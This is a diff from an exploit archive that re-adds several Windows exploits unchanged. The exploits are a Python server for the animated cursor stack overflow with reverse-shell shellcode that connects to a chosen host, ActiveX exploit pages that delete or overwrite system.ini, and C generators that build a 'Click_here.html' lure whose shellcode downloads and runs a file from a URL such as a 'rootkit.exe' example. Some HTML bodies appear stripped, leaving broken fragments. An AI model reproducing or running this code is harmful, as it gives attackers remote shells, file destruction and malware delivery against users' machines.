-'\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \ -'\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \ -'\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \ -'\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \ -'\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \ -'\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \ -'\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \ 
-'\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \ -'\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \ -'\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \ -'\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \ -'\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \ -'\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \ -'\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \ -'\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \ -'\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \ -'\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \ -'\xff\xd0' - -# Target list -target = [ \ - # call [ebx+4] - - # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language - {'addr': 0x25ba, 'len': 2, 'offset': 80}, - - # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language - {'addr': 0x25d0, 'len': 2, 'offset': 80}, - - # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English - {'addr': 0x769fc81a, 'len': 4, 'offset': 80}, - - # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English - # {'addr': 0x77d825d0, 'len': 4, 'offset': 80}, - - # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil) - {'addr': 0x769dc81a, 'len': 4, 'offset': 80}, - - # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil) - # {'addr': 0x77d625d0, 'len': 4, 'offset': 80}, - - # call [esi+4] - - # Microsoft Windows XP SP1a userenv.dll English - {'addr': 0x75a758b1, 'len': 4, 'offset': 80}, - - # Microsoft Windows XP SP1a shell32.dll English - # {'addr': 0x77441a66, 'len': 4, 'offset': 80}, - - # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil) - {'addr': 0x75a4579b, 'len': 4, 'offset': 80}, - - # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil) - # {'addr': 0x77427214, 'len': 4, 'offset': 80}, -] - -# Target list index -tidx = 0 - -def randstr(count = 1, charset = 
'ascii_alpha'): - # Set the charset - if charset == 'ascii_alpha': - charset = digits + ascii_uppercase + ascii_lowercase - elif charset == 'ascii_letters': - charset = ascii_letters - elif charset == 'ascii_lowercase': - charset = ascii_lowercase - elif charset == 'ascii_uppercase': - charset = ascii_uppercase - elif charset == 'digits': - charset = digits - elif charset == 'hexdigits': - charset = hexdigits - elif charset == 'octdigits': - charset = octdigits - - # Create the string - i = 0 - str = '' - - while i < count: - str = str + charset[randint(0, len(charset)-1)] - i = i + 1 - - return str - - -def riff_chunk(): - chunk_id = randstr(4) - chunk_data = randstr(randint(1, 256)*2) - chunk_size = pack('\n\n' + \ - randstr(randint(1, 256)) + \ - '\n\n\n' - - for i in range(randint(0, 4)): - html = html + randstr(randint(1, 256)) + '\n' - - for i in range(len(target)): - html = html + \ - '
    \n' - - for i in range(randint(0, 4)): - html = html + randstr(randint(1, 256)) + '\n' - - html = html + '
    \n' - - for i in range(randint(0, 4)): - html = html + randstr(randint(1, 256)) + '\n' - - html = html + '\n\n' - - return html - - -class RequestHandler(BaseHTTPRequestHandler): - def do_GET(self): - self.send_response(200) - - if self.path == '/': - # Send the html document - html = randhtml() - self.send_header('Content-Type', 'text/html; charset=UTF-8') - self.send_header('Content-Length', str(len(html))) - self.end_headers() - self.wfile.write(html) - return - - # Generate and send the RIFF file - riff = riff_ani_file() - self.send_header('Content-Type', 'application/octetstream') - self.send_header('Content-Length', str(len(riff))) - self.end_headers() - self.wfile.write(riff) - - -def usage(): - print 'Usage: ./%s ' \ - % basename(argv[0]) - - -if __name__ == '__main__': - print 'Windows Animated Cursor Stack Overflow Exploit' - print 'Copyright 2007 RISE Security \n' - - args = argv[1:] - - if '-h' in args or '--help' in args: - usage() - exit() - - http_host = '0.0.0.0' - http_port = 8080 - host = '127.0.0.1' - port = 1234 - - try: - http_host = argv[1] - http_port = atoi(argv[2]) - host = argv[3] - port = atoi(argv[4]) - except: - pass - - # Set shellcode host and port to connect to - buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:] - buf = buf[:166] + pack(', +# RISE Security +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA +# + +# +# Windows Animated Cursor Stack Overflow Vulnerability +# http://www.determina.com/security.research/vulnerabilities/ani-header.html +# + +from BaseHTTPServer import * +from os.path import * +from random import * +from socket import * +from string import * +from struct import * +from sys import * + +# +# windows/shell_reverse_tcp - 287 bytes +# http://www.metasploit.com +# EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1 +# +buf = \ +'\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \ +'\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \ +'\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \ +'\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \ +'\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \ +'\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \ +'\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \ +'\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \ +'\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \ +'\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \ +'\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \ +'\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \ +'\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \ +'\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \ +'\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \ +'\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \ +'\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \ +'\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \ +'\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \ +'\xff\xd0' + +# Target list +target = [ \ + # call 
[ebx+4] + + # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language + {'addr': 0x25ba, 'len': 2, 'offset': 80}, + + # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language + {'addr': 0x25d0, 'len': 2, 'offset': 80}, + + # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English + {'addr': 0x769fc81a, 'len': 4, 'offset': 80}, + + # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English + # {'addr': 0x77d825d0, 'len': 4, 'offset': 80}, + + # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil) + {'addr': 0x769dc81a, 'len': 4, 'offset': 80}, + + # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil) + # {'addr': 0x77d625d0, 'len': 4, 'offset': 80}, + + # call [esi+4] + + # Microsoft Windows XP SP1a userenv.dll English + {'addr': 0x75a758b1, 'len': 4, 'offset': 80}, + + # Microsoft Windows XP SP1a shell32.dll English + # {'addr': 0x77441a66, 'len': 4, 'offset': 80}, + + # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil) + {'addr': 0x75a4579b, 'len': 4, 'offset': 80}, + + # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil) + # {'addr': 0x77427214, 'len': 4, 'offset': 80}, +] + +# Target list index +tidx = 0 + +def randstr(count = 1, charset = 'ascii_alpha'): + # Set the charset + if charset == 'ascii_alpha': + charset = digits + ascii_uppercase + ascii_lowercase + elif charset == 'ascii_letters': + charset = ascii_letters + elif charset == 'ascii_lowercase': + charset = ascii_lowercase + elif charset == 'ascii_uppercase': + charset = ascii_uppercase + elif charset == 'digits': + charset = digits + elif charset == 'hexdigits': + charset = hexdigits + elif charset == 'octdigits': + charset = octdigits + + # Create the string + i = 0 + str = '' + + while i < count: + str = str + charset[randint(0, len(charset)-1)] + i = i + 1 + + return str + + +def riff_chunk(): + chunk_id = randstr(4) + chunk_data = randstr(randint(1, 256)*2) + chunk_size = pack('\n\n' + \ + 
randstr(randint(1, 256)) + \ + '\n\n\n' + + for i in range(randint(0, 4)): + html = html + randstr(randint(1, 256)) + '\n' + + for i in range(len(target)): + html = html + \ + '
    \n' + + for i in range(randint(0, 4)): + html = html + randstr(randint(1, 256)) + '\n' + + html = html + '
    \n' + + for i in range(randint(0, 4)): + html = html + randstr(randint(1, 256)) + '\n' + + html = html + '\n\n' + + return html + + +class RequestHandler(BaseHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + + if self.path == '/': + # Send the html document + html = randhtml() + self.send_header('Content-Type', 'text/html; charset=UTF-8') + self.send_header('Content-Length', str(len(html))) + self.end_headers() + self.wfile.write(html) + return + + # Generate and send the RIFF file + riff = riff_ani_file() + self.send_header('Content-Type', 'application/octetstream') + self.send_header('Content-Length', str(len(riff))) + self.end_headers() + self.wfile.write(riff) + + +def usage(): + print 'Usage: ./%s ' \ + % basename(argv[0]) + + +if __name__ == '__main__': + print 'Windows Animated Cursor Stack Overflow Exploit' + print 'Copyright 2007 RISE Security \n' + + args = argv[1:] + + if '-h' in args or '--help' in args: + usage() + exit() + + http_host = '0.0.0.0' + http_port = 8080 + host = '127.0.0.1' + port = 1234 + + try: + http_host = argv[1] + http_port = atoi(argv[2]) + host = argv[3] + port = atoi(argv[4]) + except: + pass + + # Set shellcode host and port to connect to + buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:] + buf = buf[:166] + pack(' ------------------------------------------------------------------------------ - Zenturi ProgramChecker ActiveX Control Multiple Insecure Methods - url: http://www.programchecker.com/activeintro.aspx - - author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not be responsible for any damage. - - THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! 
- - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 ------------------------------------------------------------------------------ - - - - - - - - - - - -# milw0rm.com [2007-06-08] +
    +-----------------------------------------------------------------------------
    + Zenturi ProgramChecker ActiveX Control Multiple Insecure Methods
    + url: http://www.programchecker.com/activeintro.aspx
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-06-08] diff --git a/platforms/windows/remote/4050.html b/platforms/windows/remote/4050.html index 1d0805672..14d95a29f 100755 --- a/platforms/windows/remote/4050.html +++ b/platforms/windows/remote/4050.html @@ -1,38 +1,38 @@ -
    ------------------------------------------------------------------------------
    - Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method
    - 
    - url: http://www.programchecker.com/activeintro.aspx
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -
    - I can't believe my eyes when I see what you can do with this ActiveX
    - (and I can't believe that this product is considered as antispyware).
    - You can use the "NavigateUrl()" to arbitrary launch local file from a pc.
    - Try, for example, to launch "c:\somefile.exe" and see what happen.
    - Imagine to use this method with the "DownloadFile()" one, you can download
    - something on the pc and run it without problems.
    - For the "DownloadFile()" vulnerability see:
    - http://www.milw0rm.com/exploits/4008
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-06-08] +
    +-----------------------------------------------------------------------------
    + Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method
    + 
    + url: http://www.programchecker.com/activeintro.aspx
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +
    + I can't believe my eyes when I see what you can do with this ActiveX
    + (and I can't believe that this product is considered as antispyware).
    + You can use the "NavigateUrl()" to arbitrary launch local file from a pc.
    + Try, for example, to launch "c:\somefile.exe" and see what happen.
    + Imagine to use this method with the "DownloadFile()" one, you can download
    + something on the pc and run it without problems.
    + For the "DownloadFile()" vulnerability see:
    + http://www.milw0rm.com/exploits/4008
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-06-08] diff --git a/platforms/windows/remote/4052.c b/platforms/windows/remote/4052.c index 62a018198..b54ca9ed0 100755 --- a/platforms/windows/remote/4052.c +++ b/platforms/windows/remote/4052.c 
@@ -1,144 +1,144 @@ -/* - Compile in LCC-win32 (Free!) - Download and exec any file you like! - Have Fun! - */ - -#include -#include -#include -char *file = "Click_here.html"; -FILE *fp = NULL; - - unsigned char sc[] = - "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" -"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" -"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" -"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" -"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" -"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" -"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" -"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" -"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" -"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" -"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" -"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" -"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; - - -char *url = NULL; -unsigned char sc_2[] = "\x00\x98"; - -char * header = -"\n" -"\n" -"\n" -"\n" -"\n" -"\n"; - -// print unicode shellcode -void PrintPayLoad(char *lpBuff, int buffsize) -{ -int i; -for(i=0;i [htmlfile]\n", argv[0]); - printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]); - printf("=-Excepti0n-=\n"); - exit(1); -} - url = argv[1]; - -if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) -{ -printf("[-] Invalid url. 
Must start with 'http://','ftp://'\n"); -return; -} - printf("[+] download url:%s\n", url); - if(argc >=3) file = argv[2]; -printf("[+] exploit file:%s\n", file); - fp = fopen(file, "w"); -if(!fp) -{ -printf("[-] Open file error!\n"); -return; -} - -//build Exploit HTML File -fprintf(fp, "%s", header); -fflush(fp); - memset(buf, 0, sizeof(buf)); -sc_len = sizeof(sc)-1; -memcpy(buf, sc, sc_len); -memcpy(buf+sc_len, url, strlen(url)); - sc_len += strlen(url); - memcpy(buf+sc_len, sc_2, 1); -sc_len += 1; - PrintPayLoad((char *)buf, sc_len); - fprintf(fp, "%s", footer); -fflush(fp); - fprintf(fp, "%s", trigger_1); -fflush(fp); - -printf("[+] exploit write to %s success!\n", file); -} - -// =-Excepti0n-= - -// milw0rm.com [2007-06-08] +/* + Compile in LCC-win32 (Free!) + Download and exec any file you like! + Have Fun! + */ + +#include +#include +#include +char *file = "Click_here.html"; +FILE *fp = NULL; + + unsigned char sc[] = + "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" +"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" +"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" +"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" +"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" +"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" +"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" +"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" +"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" +"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" +"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" +"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" +"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; + + +char *url = NULL; +unsigned char sc_2[] = "\x00\x98"; + +char * header = +"\n" +"\n" +"\n" +"\n" +"\n" +"\n"; + +// print unicode shellcode +void PrintPayLoad(char *lpBuff, int buffsize) +{ 
+int i; +for(i=0;i [htmlfile]\n", argv[0]); + printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]); + printf("=-Excepti0n-=\n"); + exit(1); +} + url = argv[1]; + +if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) +{ +printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); +return; +} + printf("[+] download url:%s\n", url); + if(argc >=3) file = argv[2]; +printf("[+] exploit file:%s\n", file); + fp = fopen(file, "w"); +if(!fp) +{ +printf("[-] Open file error!\n"); +return; +} + +//build Exploit HTML File +fprintf(fp, "%s", header); +fflush(fp); + memset(buf, 0, sizeof(buf)); +sc_len = sizeof(sc)-1; +memcpy(buf, sc, sc_len); +memcpy(buf+sc_len, url, strlen(url)); + sc_len += strlen(url); + memcpy(buf+sc_len, sc_2, 1); +sc_len += 1; + PrintPayLoad((char *)buf, sc_len); + fprintf(fp, "%s", footer); +fflush(fp); + fprintf(fp, "%s", trigger_1); +fflush(fp); + +printf("[+] exploit write to %s success!\n", file); +} + +// =-Excepti0n-= + +// milw0rm.com [2007-06-08] diff --git a/platforms/windows/remote/4053.c b/platforms/windows/remote/4053.c index b6376682f..5f78194c7 100755 --- a/platforms/windows/remote/4053.c +++ b/platforms/windows/remote/4053.c 
@@ -1,145 +1,145 @@ -/* - Compile in LCC-win32 (Free!) - Download and exec any file you like! - Have Fun! - */ - -#include -#include -#include -char *file = "Click_here.html"; -FILE *fp = NULL; - -unsigned char sc[] = -"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" -"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" -"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" -"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" -"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" -"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" -"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" -"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" -"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" -"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" -"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" -"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" -"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; - - -char *url = NULL; -unsigned char sc_2[] = "\x00\x98"; - -char * header = -"\n" -"\n" -"\n" -"\n" -"\n" -"\n"; - -// print unicode shellcode -void PrintPayLoad(char *lpBuff, int buffsize) -{ -int i; -for(i=0;i [htmlfile]\n", argv[0]); - printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]); - printf("=-Excepti0n-=\n"); -exit(1); -} - url = argv[1]; - -if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) -{ -printf("[-] Invalid url. 
Must start with 'http://','ftp://'\n"); -return; -} - printf("[+] download url:%s\n", url); - if(argc >=3) file = argv[2]; -printf("[+] exploit file:%s\n", file); - fp = fopen(file, "w"); -if(!fp) -{ -printf("[-] Open file error!\n"); -return; -} - -//build Exploit HTML File -fprintf(fp, "%s", header); -fflush(fp); - memset(buf, 0, sizeof(buf)); -sc_len = sizeof(sc)-1; -memcpy(buf, sc, sc_len); -memcpy(buf+sc_len, url, strlen(url)); - sc_len += strlen(url); - memcpy(buf+sc_len, sc_2, 1); -sc_len += 1; - PrintPayLoad((char *)buf, sc_len); - fprintf(fp, "%s", footer); -fflush(fp); - fprintf(fp, "%s", trigger_1); -fflush(fp); - -printf("[+] exploit write to %s success!\n", file); -} - -// =-Excepti0n-= - -// milw0rm.com [2007-06-08] +/* + Compile in LCC-win32 (Free!) + Download and exec any file you like! + Have Fun! + */ + +#include +#include +#include +char *file = "Click_here.html"; +FILE *fp = NULL; + +unsigned char sc[] = +"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" +"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" +"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" +"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" +"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" +"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" +"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" +"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" +"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" +"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" +"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" +"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" +"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; + + +char *url = NULL; +unsigned char sc_2[] = "\x00\x98"; + +char * header = +"\n" +"\n" +"\n" +"\n" +"\n" +"\n"; + +// print unicode shellcode +void PrintPayLoad(char *lpBuff, int buffsize) +{ +int 
i; +for(i=0;i [htmlfile]\n", argv[0]); + printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]); + printf("=-Excepti0n-=\n"); +exit(1); +} + url = argv[1]; + +if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) +{ +printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); +return; +} + printf("[+] download url:%s\n", url); + if(argc >=3) file = argv[2]; +printf("[+] exploit file:%s\n", file); + fp = fopen(file, "w"); +if(!fp) +{ +printf("[-] Open file error!\n"); +return; +} + +//build Exploit HTML File +fprintf(fp, "%s", header); +fflush(fp); + memset(buf, 0, sizeof(buf)); +sc_len = sizeof(sc)-1; +memcpy(buf, sc, sc_len); +memcpy(buf+sc_len, url, strlen(url)); + sc_len += strlen(url); + memcpy(buf+sc_len, sc_2, 1); +sc_len += 1; + PrintPayLoad((char *)buf, sc_len); + fprintf(fp, "%s", footer); +fflush(fp); + fprintf(fp, "%s", trigger_1); +fflush(fp); + +printf("[+] exploit write to %s success!\n", file); +} + +// =-Excepti0n-= + +// milw0rm.com [2007-06-08] diff --git a/platforms/windows/remote/4060.html b/platforms/windows/remote/4060.html index b243b28e1..f1eaf40a7 100755 --- a/platforms/windows/remote/4060.html +++ b/platforms/windows/remote/4060.html @@ -1,44 +1,44 @@ -
    ------------------------------------------------------------------------------------------------------------------
    - TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite
    - url: http://www.tec-it.com/asp/main/startfr.asp?LN=1
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not be responsible for any damage.
    - 
    - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - all software that use this ocx are vulnerable to this exploits.
    ------------------------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-06-12] +
    +-----------------------------------------------------------------------------------------------------------------
    + TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite
    + url: http://www.tec-it.com/asp/main/startfr.asp?LN=1
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
